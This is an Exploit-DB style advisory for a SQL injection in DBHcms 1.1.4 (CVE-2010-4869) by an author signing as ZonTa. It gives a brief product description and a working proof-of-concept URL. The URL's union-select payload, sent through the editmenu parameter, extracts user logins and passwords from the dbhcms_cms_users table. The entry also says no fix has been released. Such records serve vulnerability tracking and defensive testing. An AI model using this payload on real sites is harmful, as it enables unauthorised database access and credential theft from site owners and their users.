DBHcms 1.1.4 - 'dbhcms_pid' SQL Injection

Author: ZonTa
type: webapps
platform: php
port: 
date_added: 2010-10-24 
date_updated: 2017-03-30 
verified: 1 
codes: CVE-2010-4869;OSVDB-71321 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comdbhcms-1.1.4-install.zip

DBHcms 1.1.4 SQL Injection Vulnerability

# Exploit Title:    DBHcms 1.1.4 SQL Injection Vulnerability
# Date: 24-10-2010
# Author: ZonTa
# Mail: zontahackers[at]gmail[dot]com
# IM : zontahackers[at]live[dot]com

# Software Link:    http://www.drbenhur.com/downloads-dbhcms-114-1-69-en.html
# Version: 1.1.4
# Tested on: Apache,PHP5


ABOUT
--------------

The DBHcms is a Open Source content management system for personal
and small business websites. It is search engine optimized, also
for multiple languages simultaneously by allowing the search engine
bot to index every single page.


POC
--------------

http://192.168.1.100/DBHcms/index.php?dbhcms_pid=-81&editmenu=-2+union+select+1,2,3,4,5,6,group_concat(user_login,0x3a,user_passwd),8,9,10,11,12,13,14+from+dbhcms_cms_users--


FIX
--------------

Not yet released.


Greetz to Sri Lankanz ~